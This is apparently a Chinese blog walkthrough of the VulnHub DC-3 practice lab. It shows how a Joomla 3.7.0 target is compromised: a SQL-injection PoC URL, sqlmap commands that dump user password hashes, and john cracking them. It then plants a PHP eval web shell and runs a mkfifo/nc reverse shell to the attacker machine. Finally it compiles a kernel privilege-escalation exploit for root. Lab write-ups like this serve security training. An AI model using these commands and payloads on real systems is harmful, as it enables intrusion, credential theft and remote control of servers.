DC -3靶场渗透

已于 2024-10-06 19:40:03 修改
阅读量929 收藏 14
点赞数 16
文章标签: 安全
于 2024-10-05 17:40:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84651063/article/details/142714059
版权

一、环境搭建

 靶场下载地址:

https://www.vulnhub.com/entry/dc-32,312/

二、渗透靶场

靶场ip:192.168.254.0/24

1、信息收集:寻找靶场真实ip

nmap -sP 192.168.254.0/24

7f64cbd740d64fafbac3d71f4404990d.png

192.168.254.1 vm8网卡

192.168.254.2 网关

192.168.254.132 靶机

192.168.254.254 DHCP服务器

192.168.254.129 kali本机

2、信息收集:探端口及服务

nmap -A -p- -v 192.168.254.132

-A 综合性扫描

-v 冗余模式。强烈推荐使用这个选项,它会给出扫描过程中的详细信息

354ebddb7a824258b9f125e008cfb74a.png

发现开放了80端口,存在web服务,Apache/2.4.18,CMS为Joomla

bafe375e75df4f9c91f24c3b7c4dad0f.png

他告诉我们这次DC-3实战只有一个目标获得root权限

3、 利用JoomScan进行扫描获取后台地址

由于我们前面采用nmap进行扫描时我们已经发现了中间件为joomla,我们可以采用joomscan进行扫描,如果我们不知道是joomla,我们可以采用目录扫描或者nikto等扫描工具进行扫描。发现更多的信息。

joomscan --url http://192.168.66.142  提示没有joomscan 选择y安装

9e5571dae8a346fa8907640be4eb8b70.png

扫描结果如下

f2f5558b9d6246c380e7cd68e4f81e34.png

知道了joomla cms版本为3.7.0
得到了网站后台地址http://192.168.254.132/administrator/

925f3e5a045b43dd910ea5a6858f8cb1.png

4、利用nikto扫描获取后台地址

      Nikto是一个开源的WEB扫描评估软件,可以对Web服务器进行多项安全测试,能在230多种服务器上扫描出 2600多种有潜在危险的文件、CGI及其他问题。Nikto可以扫描指定主机的WEB类型、主机名、指定目录、特定CGI漏洞、返回主机允许的 http模式等

我们前面已经知道了CMS是joomla,并且知道了后台地址,针对于这一个靶场这一步没有任何意义,这里只是提供一个思路,目录扫描,这里就不拓展了。

nikto --url http://192.168.254.132/ 

14f2ef18136247a09ced772d8b7e697f.png

5、查找漏洞发现存在SQL注入

我们前面知道了CMS为joomla,版本为3.7.0  使用searchsploit检查到有对应的漏洞

searchsploit joomla 3.7.0

8612fe7e05864bf28e7d96c395a3ff5b.png

我们发现有一个SQL注入,还存在一个XSS

我们可以看一下这个漏洞的提示信息

searchsploit -m 42033.txt

0a2145fa9bb24949ad74c5a87932f2bc.png

查看提示信息 

cat 42033.txt

c33400c54cd949e3a66c03ef055566a0.png 我们看到了POC,我们验证一下,把localhost修改为我们的靶机IP就ok

http://192.168.254.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

看到提示,数据库语句错误,说明进行了拼接,存在SQL注入

30369e1407e84092b6b14ad4205213c2.png

6、sqlmap跑出数据

1.跑出所有数据库

sqlmap -u "http://192.168.254.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] –batch

f8cb21548c1f4485b5a2cd492d81467d.png

扫描结果
成功把数据库跑出来了

ac2f5af31c6646df8b2a1e52db31dd98.png

2.获取当前数据库的名字joomladb

sqlmap -u "http://192.168.254.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --current-db –batch

9506c92d49cf40a380798f72c766c6b7.png

sqlmap -u "http://192.168.254.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables --batch

7ea1a88ca215476b908622f2f648664d.png

观察表名,很明显,我们会关注#__users这张表

3.获取joomladb的users表的字段名

sqlmap -u "http://192.168.254.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" --columns

第一个选项,直接回车使用默认的“Y”

17edb68ef01740e297a43948d3ef661d.png

第二个选项,使用“y”,不要使用默认的,不然会出错

f80c351a80ee4a74a93066bb5316489b.png

第三个选项,随意

5a8ca42db1684d0fbe250865d028f27c.png

第四个选项使用10线程

3cb289c122c0443fa659b7c4ea93e7ea.png

最终跑出六个字段

58297cee9a054188a6899c1437465914.png

4.获取目标字段username和password

sqlmap -u "http://192.168.254.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" --columns -C "username,password" --dump --batch

获得结果如下
拿到一个用户名和加密的密码

d7b52f51d8fa423f8fe19ac957a88594.png

7、利用john爆破密码snoopy

    使用john破解出admin密码,john the ripper是一款本地密码破解工具,可以从我们上面生成的shadow文件(密码散列)中破解出密码。破解时间取决于密码的复杂程度以及破解模式。

创建一个1.txt,把加密的密码字段写入

da84b6eb3a494be29b80ae995e0678e0.png

使用john破解出admin密码是snoopy

edabd63bbd2548f6af180d3cdf1cdb0c.png

8、利用获取到的账号密码进行登录

http://192.168.254.132/administrator/

admin/snoopy

登陆成功

3077559c8c3a4435a862c1852dbe64f0.png

9、上传webshell

 发现一个上传点

b33509026d4440a2bfbdc51536562f8e.png

点击Beez3 Details and Files进入

c75a86e22f7042a8b9e685597845cde7.png

点击newfiles

186e5aa9fe1b4c05ad13abaed019f6ca.png

这儿我们发现可以上传文件,考虑上传木马,也可以创建文件进行编辑

要上传木马,我们先要找到当前文件所在的目录

9a0dd30e2da64dcfa15de5b8cb12a26d.png

http://192.168.254.132/templates/beez3/html/

cc91e0af1c4341faace531ad85a32372.png

回到刚才的页面点击new file
在html下创建一个php文件,名字叫做shell

c0d50b3894894b1fac661f2fb78146c6.png

创建成功之后,跳到编辑页面,然后我们输入php一句话,点击左上角绿色的save进行保存

<?php

echo ("密码是a");

@eval($_REQUEST [a]);

?>

d0feece94a394612bdd4b62bd81956be.png

再次访问http://192.168.254.132/templates/beez3/html/
发现多了一个shell.php文件,我们访问一下

44897575d0184077a7d9994d8a4e500e.png

访问webshell,得到我们设置的会先内容,文件上传成功

http://192.168.254.132/templates/beez3/html/shell.php

ef885572da444ce6bc9f30ed2c875f1f.png

10、蚁剑管理webshell

    右键添加数据

82e4d49419404231b45731b76d14ec11.png

右键进入虚拟终端执行whaomi查询我权限,是www-data权限

dba9423bb6554ac4915b573f5b3a0f37.png

11、反弹shell到kali

蚁剑看到的终端不如kali清晰,反弹一个shell到kali

1.kali监听

nc -lvvp 1234

1045dded3fe44dddbba75a85e5441269.png

2.靶机连接

nc -e /bin/bash 192.168.254.129 1234

发现-e参数不可用

e75e16f0395f4b538cd98fe003d0bb88.png

使用如下目录连接

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.254.129 1234 >/tmp/f

6f9eaa8a12fe42b7afb77c1c6ebf3973.png

f9963efc8a4b49d68a949cff8f3b3924.png

12、创建交互式shell

经常用shell的都知道这个shell不好用,我们建立一个交互式shell

常用的就是python创建交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

cd856a8cb2fd4750b89127881c4007ae.png

13、使用辅助脚本发现提权漏洞

1.下载辅助脚本Linux-Exploit-Suggester.sh

下载地址:

https://github.com/mzet-/linux-exploit-suggester

2.上传辅助脚本

我们直接在蚁剑中上传

5673d51d502747c7a5408e88efacfe1a.png

上传成功

3.发现漏洞

ls -l linux-exploit-suggester.sh

0498af7f16654e1c8a9d5228993922d2.png

发现没有执行权限,我们给他加个执行文件

chmod +x linux-exploit-suggester.sh

a49b02e212d248b7af212de1994a1b4a.png

 执行脚本

./linux-exploit-suggester.sh

发现很多可利用漏洞

763192482f54422f8ba0d7808d6e6ea4.png

228da1a789e645c790c0f9bce5fe1ab4.png

13、使用辅助脚本提权

1.获取提权脚本

上面发现了很多漏洞,这里我们挑一个进行提权

挑选CVE-2016-4557

9a4d7ddde35f4daebf3f5d7e1bec6d3c.png

在图片里可以看到是一个39772的文件,由于给出的那个URL无法下载

也可以去searchsploit里面去看看 

a4e402fa68914a39b4ddf8fc01bfb97a.png

地址根上面一样也不能使用

                        

2.可以使用下面地址直接下载

bin-sploits/39772.zip · main · Exploit-DB / Binary Exploits · GitLab

    

3.提权

解压文件

unzip 39772.zip

cd 33792

ls

tar -xvf exploit.tar

cd ebpf_mapfd_doubleput_exploit

./compile.sh

./doubleput

执行完之后,提权成功

获得root权限

14、发现the-flag.txt

ls

cat the-flag.txt

kv0vi
关注
Vulnhub-DC-3靶场渗透练习
weixin_52451257的博客
11-17 2996
Vulnhub-DC-3 1105 DC-3 靶场地址: https://www.vulnhub.com/entry/dc-32,312/ 第一步:信息收集 nmap -sn 192.168.231.0/24 nmap -A -p- 192.168.231.141 dirb http://192.168.231.141 nikto -h http://192.168.231.141 去了日常四件套进行信息收集还可以通过joomscan工具对网站进行扫描 joomsc...
DC-1靶场搭建及渗透
weixin_55772865的博客
06-13 633
回到/var/www目录下,执行加密脚本 cd ../ php scripts/password-hash.sh 666。1.回到该靶场的根目录下,在scripts目录下存在hash密码加密脚本password-hash.sh。4.扫描192.168.75.129发现就是我们要找的dc-1,且开放80端口,尝试访问一下。首先查找有suid权限的文件,发现find命令有suid权限,那就利用find命令进项提权。4.更新后用户名:admin 密码:666,去开放的80端口网页访问。
DC-3实验解析步骤
2401_83566257的博客
10-05 1508
与之前的DC版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有线索。利用john爆破密码snoopy使用john破解出admin密码,john the ripper是一款本地密码破解工具,可以从我们上面生成的shadow文件(密码散列)中破解出密码。Nikto扫描 我们前面已经知道了CMS是joomla,并且知道了后台地址,针对于这一个靶场这一步没有任何意义,这里只是提供一个思路,目录扫描,这里就不拓展了。在图片里可以看到是一个39772的文件,由于给出的那个URL无法下载。
综合靶场DC-3
2401_87609825的博客
10-08 957
输入:http://192.168.63.131/templates/beez3/html/shell.php。在火狐中URL里面输入:http://192.168.63.131/administrator/输入:http://192.168.63.131/templates/beez3/html/再次访问http://192.168.63.131/templates/beez3/html/
DC-3靶机渗透测试过程(个人学习)
m0_59028058的博客
06-03 2361
下载官网地址:https://www.攻击机kali的IP地址:192.168.37.129kali和DC-3这里都用NAT模式.DC-3需要多修改一些东西把IDE里面的改成IDE 0:0。
DC-3靶场渗透
一纸荒芜的博客
12-12 3660
DC3靶场打靶记录!
DC-1靶场渗透实验
Alashan12的博客
05-05 2005
一、环境准备 Kali虚拟机 DC-1靶场http://www.five86.com/downloads/DC-1.zip 首先将kali虚拟机和靶机DC1都设置为net模式 ifconfig查看kali的IP为192.168.152.128 使用nmap扫描此网段下的主机 启动DC-1靶机 再次扫描得到DC-1靶机的IP地址为192.168.152.138 二、实验过程 使用nmap针对该IP进行详细扫描 发现打开了22、80和111的端口,还开启了s...
【技术分享】实战dc-3靶场及其技巧讲解
军火库
07-22 356
本期技术文章将与大家分享小星实战“dc-3靶场”的经验,通过分析其渗透过程以及不同的getshell方法,与大家共同探讨该靶场的破解技巧。
Vulnhub靶场 DC系列 DC-4靶场
sdfsergfr的博客
12-10 403
Vulnhub靶场 CD系列 CD-4靶场 ,黑盒实验,反弹shell网站,利用22端口ssh服务,kali密码爆破,得到admin用户的密码happy,登录admin用户 bp对radio位置的发送,得到密码字典 old-passwords.bak。添加反弹shell,得到密码字典 old-passwords.bak。九头蛇hydra:利用密码字典发现ssh的账号:jim密码: jibril04 。finalshell ssh连接 对文件查找 得到用户:Charles 密码:^xHhA&hvim0y。
DC系列漏洞靶场-渗透测试学习复现(DC-3)
W983079520的博客
12-02 1401
DC-3是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了linux内核漏洞提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-3靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口只有一个: 80(http默认端口)。 4 访问web 访问we
靶场实战】dc-1靶机 渗透测试
weixin_44023442的博客
04-05 1269
参考文章 DC-1 靶机安装及练习 一、搭建环境 搭建环境 下载地址:dc-1 加压后用VMware打开,配置网络适配器为NAT模式 注意:dc-1开机后会提示输入账号密码,这里可以不用管他。 开启kali虚拟机,同样的,配置网络适配器为NAT模式 测试环境 在kali终端输入:ifconfig,查看当前网段 可知,当前c段是 192.168.224.0 用nmap扫描整个c段,输入nmap -sP 192.168.224.0/24 很明显,192.168.224.129 就是dc-1的ip地址
安全软件开发框架(SSDF) 1.1:降低软件漏洞风险的建议》解读(四)
daopuyun的博客
11-04 555
安全软件开发框架SSDF是由美国国家标准与技术研究院发布的关于安全软件开发的一组实践,帮助开发组织减少发布的软件中的漏洞数量,减少利用未检测到或未解决的漏洞的潜在影响,从根本上解决漏洞防止再次发生。以上是安全软件开发框架(SSDF)1.1版本中的软件保护部分的全部内容,后面会继续为大家整理可靠软件生产部分和漏洞响应部分,欢迎大家继续关注。(谢绝转载,更多内容可查看我的主页)
漫途焊机安全生产监管方案,提升安全生产管理水平!
mantoo2014的博客
11-01 471
随着智能制造时代的到来,企业安全生产管理的重要性日益凸显。因此,利用物联网技术和设备监控技术加强焊机安全生产监管,成为企业提升安全生产管理效率、降低安全事故率的重要手段。漫途焊机安全生产监管方案,凭借其物联网技术和设备监控技术。
【鉴权】OAuth 2.0: 高度灵活与安全的身份认证框架
最新发布
人生苦短,睡觉要紧,睡醒再说
11-05 496
OAuth 2.0不仅允许第三方应用在不访问用户密码的前提下安全地访问用户在其他平台上的资源(如社交媒体账户或云存储),还通过灵活的授权模式满足了不同应用场景的需求。无论是Web应用、移动端应用还是桌面客户端,OAuth 2.0都为开发者提供了一个高效、可靠的解决方案。在本篇文章中,我们将深入分析OAuth 2.0的核心概念、授权流程、常见授权模式以及其在实际开发中的应用,帮助开发者全面理解这一授权机制的优势与实现方法。
网络安全渗透实际案例
专研计算机网络,数据通信,网络安全,系统集成
11-02 1405
该案例演示了如何通过信息收集、漏洞扫描、漏洞利用和后渗透测试等步骤,对目标系统进行完整的渗透测试。通过详细的操作步骤和修复建议,可以帮助安全人员更好地防御类似攻击。注意:渗透测试应仅限于合法授权的网络或系统。未经授权的渗透测试属于非法行为。步骤编号步骤名称操作说明代码示例1环境准备确保Kali Linux及相关工具已安装,如NmapMetasploitNetcat等。无2信息收集使用Nmap扫描目标系统,识别开放端口和服务版本。3确定服务漏洞。
【论文速读】| APILOT:通过避开过时API陷阱,引导大语言模型生成安全代码
m0_73736695的博客
11-01 1286
论文提出了一种名为APILOT的系统,它通过实时更新过时API的数据集,并结合增强生成方法,引导LLMs生成版本感知的安全代码。
RSA算法:数字安全的基石
zhaoshanshan168的博客
11-03 581
**选择公钥指数**:选择e,满足1 < e < φ(n)且gcd(e, φ(n)) = 1。- **计算私钥**:计算d,使得d * e ≡ 1 (mod φ(n))。- **大数分解**:RSA的安全性基于将模数n分解为其质因数p和q的困难性。- **计算欧拉函数**:φ(n) = (p - 1)(q - 1)。- **算法优化**:使用快速幂算法进行加密和解密,提升效率。- **数字证书**:用于身份验证,确保网站的真实性。- **计算模数**:n = p * q。
ICT网络赛道安全考点知识总结3
m0_72765822的博客
11-03 485
关于SSL VPN的特点的描述如下: 由于SSL VPN登录方式借助了浏览器,所以实现了客户端的自动安装和配置,这样用户可以随时随地用设备快捷登录,同时也缓解了网络管理员维护客户端等方面的压力。 SSL VPN针对内网资源可以解析到应用层,并精细化地发布应用。 SSL VPN可以深层次地访问内网资源并精细控制应用访问。 SSL VPN能支持各种IP应用。 SSL VPN通常可以支持多种认证方式,并且可以与现有身份认证系统集成,以提供更灵活的身份验证选项。 入侵防御特征库通常包含预定义签名,这些签名
高校实验室安全巡检系统设计与实现(源码+定制+开发)高校实验室巡检系统、实验室安全管理平台、实验室安全监控系统、智能实验室巡查系统、高校实验室风险管理
程序员阿龙的博客
11-03 1101
博主介绍: ✌我是阿龙,一名专注于Java技术领域的程序员,全网拥有10W+粉丝。作为CSDN特邀作者、博客专家、新星计划导师,我在计算机毕业设计开发方面积累了丰富的经验。同时,我也是掘金、华为云、阿里云、InfoQ等平台的优质作者。通过长期分享和实战指导,我致力于帮助更多学生完成毕业项目和技术提升。 技术范围: 我熟悉的技术领域涵盖SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等方
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值